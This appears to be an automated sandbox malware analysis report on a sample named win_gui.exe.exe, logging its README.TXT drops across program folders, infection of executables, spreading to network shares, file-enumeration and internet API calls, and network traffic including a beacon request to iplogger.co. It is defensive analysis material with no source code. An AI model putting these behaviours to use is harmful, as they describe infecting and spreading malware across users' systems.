Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\limited\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\unlimited\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\DataType\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\Part\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\Data Sources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\MSMAPI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\ole db\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EURO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\GRPHFLT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\MSClientDataMgr\README.TXTJump to behavior
Source: unknownHTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.5:49959 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49964 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49966 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50105 version: TLS 1.2
Source: win_gui.exe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Spreading

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7-zip.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7z.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7-zip32.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTMJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\Welcome.htmlJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
Spreads via windows shares (copies files to share folders)
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\WindowsRE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C812D InterlockedIncrement,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,Sleep,FindNextFileW,FindClose,InterlockedDecrement,Sleep,Sleep,0_2_005C812D
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9F53 FindFirstFileW,FindClose,0_2_005C9F53
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00675337 FindFirstFileExA,0_2_00675337
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9585 GetEnvironmentVariableW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,CreateDirectoryW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,GetModuleFileNameW,CopyFileW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CreateProcessW,ExitProcess,0_2_005C9585
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CA715 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,lstrlenW,lstrlenW,0_2_005CA715
Source: Joe Sandbox ViewIP Address: 172.67.167.249 172.67.167.249
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: iplogger.co
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CAF2D Sleep,lstrlenA,InternetOpenW,MultiByteToWideChar,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_005CAF2D
Source: global trafficHTTP traffic detected: GET /155qJ4.torrent HTTP/1.1Referer: BEGINUser-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322Host: iplogger.coCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
